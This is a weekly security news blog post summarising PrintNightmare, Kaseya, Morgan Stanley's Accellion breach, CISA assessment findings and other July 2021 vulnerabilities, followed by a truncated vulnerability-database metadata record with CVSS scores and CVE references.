Last Week’s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers

2021-07-11T20:52:51

Description

Hello guys! The third episode of Last Week’s Security news, July 5 - July 11. There was a lot of news last week. Most of them was again about PrintNightmare and Kaseya. The updates for PrintNightmare (CVE-2021-34527) [were finally released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) mid-week. It became possible not only to disable the service, but also to update the hosts. This is especially important for desktops that need to print something. But the problem is that these [patches can be bypassed](<https://twitter.com/wdormann/status/1412813044279910416>). "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE". Microsoft has updated their security update guide after that: "if you set this reg key to = 1 then the system is vulnerable by design". It seems that solving this problem requires hardening and registry monitoring. PrintNightmare exploitation just got easier. Rapid7 security [researchers have added a new module](<https://www.rapid7.com/blog/post/2021/07/09/metasploit-wrap-up-120/>) for PrintNightmare to Metasploit. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\SYSTEM. There was a lot of news regarding Kaseya, I would not say that in a week we learned something fundamentally new, but almost all guesses were confirmed. [7 CVEs that could be used in attacks became known](<https://www.rapid7.com/blog/post/2021/07/08/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) (CVE-2021-30116, CVE-2021-30117, CVE-2021-30118, CVE-2021-30119, CVE-2021-30120, CVE-2021-30121, CVE-2021-30201). Huntress Security Researcher [Caleb Stewart has successfully reproduced the Kaseya VSA exploits](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) used to deploy REvil/Sodinokibi ransomware and released a POC demonstration video depicting an Authentication Bypass, an Arbitrary File Upload and Command Injection. [Brian Krebs also wrote about a directory traversal](<https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/>) vulnerability (CVE-2015-2862) on the Customer Portal portal.kaseya.net that has not been fixed since 2015. The portal "was deprecated but left up". The Compromise Detection Tool has been made public. The ransomware operators have demanded $70m for a master decryption key. Some threat actors were targeting victims via email with fake patches that push Cobalt Strike payloads. [Kaseya delays SaaS restore to Sunday July 11](<https://www.theregister.com/2021/07/09/kaseya_saas_restoration_july_11/>) and promises “exponentially more secure” product. And if you think that only Kaseya has such problems, you are wrong. Continuing on the theme that the security problems of service providers are your problems. [Morgan Stanley has confirmed a data breach](<https://www.darkreading.com/attacks-breaches/morgan-stanley-discloses-data-breach-/d/d-id/1341503>) in which attackers were able to access personal information belonging to customers by targeting a vulnerability in the Accellion FTA server. Attackers were able to access participant data, including name, last known address, birth date, Social Security number, and corporate company name. The server belonged to Guidehouse, a vendor that provides account maintenance services to Morgan Stanley's StockPlan Connect business. While Guidehouse patched the vulnerability within five days of its availability, the attacker was able to access the data around that time, officials said. The vendor discovered the attack in March 2021 and learned it affected Morgan Stanley in May. As you can see, 5 days for patching a critical vulnerability at the perimeter is unacceptable. The US Cybersecurity and Infrastructure Security Agency (CISA) [has released an analysis](<https://www.cisa.gov/publication/rva>) detailing the findings from Risk and Vulnerability Assessments (RVAs) conducted during the 2020 fiscal year across industries. The officials' analysis details a sample attack path an intruder could take to compromise an organization, with weaknesses that represent the ones CISA saw in RVAs over the past year. Quite interesting stuff, especially [the infographics](<https://www.cisa.gov/sites/default/files/publications/FY20_RVAs_Mapped_to_the_MITRE_ATTCK_Framework_508_corrected.pdf>). For example, it was especially interesting to see statistics on Initial Access. Phishing links were most common and used to gain initial access in 49% of RVAs. Next were exploits of public-facing applications (11.8%), followed by phishing attachments (9.8%). Therefore, if you focus on anti-phishing and perimeter control, you are building your first line of defense correctly. [North Korean APT Lazarus Group impersonates](<https://threatpost.com/lazarus-engineers-malicious-docs/167647/>) Airbus, General Motors and Rheinmetall to lure Job-Seeking Engineers into downloading malware. This is stated in a report published by AT&T Alien Labs. The ultimate payload of the Rheinmetall document uses Mavinject.exe, a legitimate Windows component that has been used and abused before in malware activity, to perform arbitrary code injections inside any running process. The Airbus document macro executes the payload with an updated technique. The attackers are no longer using Mavinject, but directly executing the payload with explorer.exe, significantly modifying the resulting execution tree. So, when you suddenly see interesting job offers in your inbox, be careful. [A set of high-severity privilege-escalation vulnerabilities](<https://threatpost.com/cisco-bpa-wsa-bugs-cyberattacks/167654/>) affecting Business Process Automation (BPA) application and Cisco’s Web Security Appliance (WSA) and could allow authenticated, remote attackers to access sensitive data or take over a targeted system. The fact that authentication is required makes it less interesting. In addition, these are apparently not the most popular Cisco products. But if you are using BPA or WSA, be aware. [Four security vulnerabilities](<https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html>) (CVE-2020-7388, CVE-2020-7389, CVE-2020-7387, CVE-2020-7390) have been uncovered in the Sage X3 enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable hackers to execute malicious commands and take control of vulnerable systems. Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required. Multiple security vulnerabilities have been [disclosed in Philips Clinical Collaboration](<https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html>) Platform Portal (Vue PACS). Successful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system. Еverything related to medicine requires the strictest certification. As you can see, it doesn't help much. ![](http://feeds.feedburner.com/~r/avleonov/~4/L83_6PGWaZs)

{"id": "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "type": "avleonov", "bulletinFamily": "blog", "title": "Last Week\u2019s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers", "description": "Hello guys! The third episode of Last Week\u2019s Security news, July 5 - July 11. There was a lot of news last week. Most of them was again about PrintNightmare and Kaseya.\n\nThe updates for PrintNightmare (CVE-2021-34527) [were finally released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) mid-week. It became possible not only to disable the service, but also to update the hosts. This is especially important for desktops that need to print something. But the problem is that these [patches can be bypassed](<https://twitter.com/wdormann/status/1412813044279910416>). "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE". Microsoft has updated their security update guide after that: "if you set this reg key to = 1 then the system is vulnerable by design". It seems that solving this problem requires hardening and registry monitoring.\n\nPrintNightmare exploitation just got easier. Rapid7 security [researchers have added a new module](<https://www.rapid7.com/blog/post/2021/07/09/metasploit-wrap-up-120/>) for PrintNightmare to Metasploit. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\\SYSTEM.\n\nThere was a lot of news regarding Kaseya, I would not say that in a week we learned something fundamentally new, but almost all guesses were confirmed. [7 CVEs that could be used in attacks became known](<https://www.rapid7.com/blog/post/2021/07/08/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) (CVE-2021-30116, CVE-2021-30117, CVE-2021-30118, CVE-2021-30119, CVE-2021-30120, CVE-2021-30121, CVE-2021-30201). Huntress Security Researcher [Caleb Stewart has successfully reproduced the Kaseya VSA exploits](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) used to deploy REvil/Sodinokibi ransomware and released a POC demonstration video depicting an Authentication Bypass, an Arbitrary File Upload and Command Injection. [Brian Krebs also wrote about a directory traversal](<https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/>) vulnerability (CVE-2015-2862) on the Customer Portal portal.kaseya.net that has not been fixed since 2015. The portal "was deprecated but left up". The Compromise Detection Tool has been made public. The ransomware operators have demanded $70m for a master decryption key. Some threat actors were targeting victims via email with fake patches that push Cobalt Strike payloads. [Kaseya delays SaaS restore to Sunday July 11](<https://www.theregister.com/2021/07/09/kaseya_saas_restoration_july_11/>) and promises \u201cexponentially more secure\u201d product. And if you think that only Kaseya has such problems, you are wrong.\n\nContinuing on the theme that the security problems of service providers are your problems. [Morgan Stanley has confirmed a data breach](<https://www.darkreading.com/attacks-breaches/morgan-stanley-discloses-data-breach-/d/d-id/1341503>) in which attackers were able to access personal information belonging to customers by targeting a vulnerability in the Accellion FTA server. Attackers were able to access participant data, including name, last known address, birth date, Social Security number, and corporate company name. The server belonged to Guidehouse, a vendor that provides account maintenance services to Morgan Stanley's StockPlan Connect business. While Guidehouse patched the vulnerability within five days of its availability, the attacker was able to access the data around that time, officials said. The vendor discovered the attack in March 2021 and learned it affected Morgan Stanley in May. As you can see, 5 days for patching a critical vulnerability at the perimeter is unacceptable.\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) [has released an analysis](<https://www.cisa.gov/publication/rva>) detailing the findings from Risk and Vulnerability Assessments (RVAs) conducted during the 2020 fiscal year across industries. The officials' analysis details a sample attack path an intruder could take to compromise an organization, with weaknesses that represent the ones CISA saw in RVAs over the past year. Quite interesting stuff, especially [the infographics](<https://www.cisa.gov/sites/default/files/publications/FY20_RVAs_Mapped_to_the_MITRE_ATTCK_Framework_508_corrected.pdf>). For example, it was especially interesting to see statistics on Initial Access. Phishing links were most common and used to gain initial access in 49% of RVAs. Next were exploits of public-facing applications (11.8%), followed by phishing attachments (9.8%). Therefore, if you focus on anti-phishing and perimeter control, you are building your first line of defense correctly.\n\n[North Korean APT Lazarus Group impersonates](<https://threatpost.com/lazarus-engineers-malicious-docs/167647/>) Airbus, General Motors and Rheinmetall to lure Job-Seeking Engineers into downloading malware. This is stated in a report published by AT&T Alien Labs. The ultimate payload of the Rheinmetall document uses Mavinject.exe, a legitimate Windows component that has been used and abused before in malware activity, to perform arbitrary code injections inside any running process. The Airbus document macro executes the payload with an updated technique. The attackers are no longer using Mavinject, but directly executing the payload with explorer.exe, significantly modifying the resulting execution tree. So, when you suddenly see interesting job offers in your inbox, be careful.\n\n[A set of high-severity privilege-escalation vulnerabilities](<https://threatpost.com/cisco-bpa-wsa-bugs-cyberattacks/167654/>) affecting Business Process Automation (BPA) application and Cisco\u2019s Web Security Appliance (WSA) and could allow authenticated, remote attackers to access sensitive data or take over a targeted system. The fact that authentication is required makes it less interesting. In addition, these are apparently not the most popular Cisco products. But if you are using BPA or WSA, be aware.\n\n[Four security vulnerabilities](<https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html>) (CVE-2020-7388, CVE-2020-7389, CVE-2020-7387, CVE-2020-7390) have been uncovered in the Sage X3 enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable hackers to execute malicious commands and take control of vulnerable systems. Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required.\n\nMultiple security vulnerabilities have been [disclosed in Philips Clinical Collaboration](<https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html>) Platform Portal (Vue PACS). Successful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system. \u0415verything related to medicine requires the strictest certification. As you can see, it doesn't help much.\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/L83_6PGWaZs)", "published": "2021-07-11T20:52:51", "modified": "2021-07-11T20:52:51", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "http://feedproxy.google.com/~r/avleonov/~3/L83_6PGWaZs/", "reporter": "Alexander Leonov", "references": [], "cvelist": ["CVE-2020-7388", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30201", "CVE-2020-7390", "CVE-2021-30119", "CVE-2020-7387", "CVE-2020-7389", "CVE-2021-34527", "CVE-2021-30116", "CVE-2015-2862", "CVE-2021-30121", "CVE-2021-30120"], "immutableFields": [], "lastseen": "2021-07-28T14:34:07", "viewCount": 24472, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:923F0E8E-CF44-416D-A421-F2177898261A", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238", "AKB:E22D11BC-89F5-42AA-B31B-78D5E22902DB"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "cert", "idList": ["VU:383432", "VU:919604"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465", "CPAI-2021-0946"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:91DA945EA20AF1A221FDE02A2D9CE315"]}, {"type": "cve", "idList": ["CVE-2015-2862", "CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390", "CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201", "CVE-2021-34527"]}, {"type": "exploitdb", "idList": ["EDB-ID:37621"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FDD8871B2AC6AE3BD37805BBDEFBE4EC"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "0BB19334-D311-5464-B40B-7B27A0AD8825", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "21F83D93-118D-50C7-A5C0-B2069237666E", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4E279194-AC85-5607-A943-AC23EADADEF7", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "64AAF745-D50D-575C-B3FF-A09072475502", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B8D9E2C0-202B-5806-88D2-B0E797582618", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "D089579B-4420-5AD5-999F-45063D972E66", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D"]}, {"type": "hivepro", "idList": ["HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "kaspersky", "idList": ["KLA12213", "KLA12214"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:6C9A4C86453CF1F4DA06688B3CC1E186", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:EB242DD11B13A86E44E4325F83689782"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-SAGE-X3_ADXSRV_LOGIN-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-SAGE-X3_ADXSRV_AUTH_BYPASS_CMD_EXEC-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527"]}, {"type": "mskb", "idList": ["KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "nessus", "idList": ["KASEYA_9_5_7_2994.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805927"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163624", "PACKETSTORM:167261"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D64EF678F668492563D94414E31C3D2", "RAPID7BLOG:7E8AECF6144050DEA823EEFC18D04C57", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14610"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:071674FE55E0EC791A8A321B61E9ED63", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:1812C7168898D0993D0783FDC775739F", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:5B336156927E228EFBD090418D063D2D", "THN:6141B56028352C293B8E6D7F0948C55C", "THN:6428957E9DED493169A2E63839F98667", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:F35E41E26872B23A7F620C6D8F7E2334"]}, {"type": "threatpost", "idList": ["THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B3B543942E69CA8867497B6F2638F91F", "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36584"]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:E22D11BC-89F5-42AA-B31B-78D5E22902DB"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "cert", "idList": ["VU:383432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0"]}, {"type": "cve", "idList": ["CVE-2015-2862", "CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390", "CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201", "CVE-2021-34527"]}, {"type": "exploitdb", "idList": ["EDB-ID:37621"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FDD8871B2AC6AE3BD37805BBDEFBE4EC"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "0BB19334-D311-5464-B40B-7B27A0AD8825", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4E279194-AC85-5607-A943-AC23EADADEF7", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "64AAF745-D50D-575C-B3FF-A09072475502", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B8D9E2C0-202B-5806-88D2-B0E797582618", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "D089579B-4420-5AD5-999F-45063D972E66", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D"]}, {"type": "hivepro", "idList": ["HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "kaspersky", "idList": ["KLA12213", "KLA12214"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:EB242DD11B13A86E44E4325F83689782"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527"]}, {"type": "mskb", "idList": ["KB5004945", "KB5004946"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "nessus", "idList": ["KASEYA_9_5_7_2994.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805927"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163624"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D64EF678F668492563D94414E31C3D2", "RAPID7BLOG:7E8AECF6144050DEA823EEFC18D04C57", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:071674FE55E0EC791A8A321B61E9ED63", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:1812C7168898D0993D0783FDC775739F", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:5B336156927E228EFBD090418D063D2D", "THN:6141B56028352C293B8E6D7F0948C55C", "THN:6428957E9DED493169A2E63839F98667", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF"]}, {"type": "threatpost", "idList": ["THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:B3B543942E69CA8867497B6F2638F91F", "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36584"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-7388", 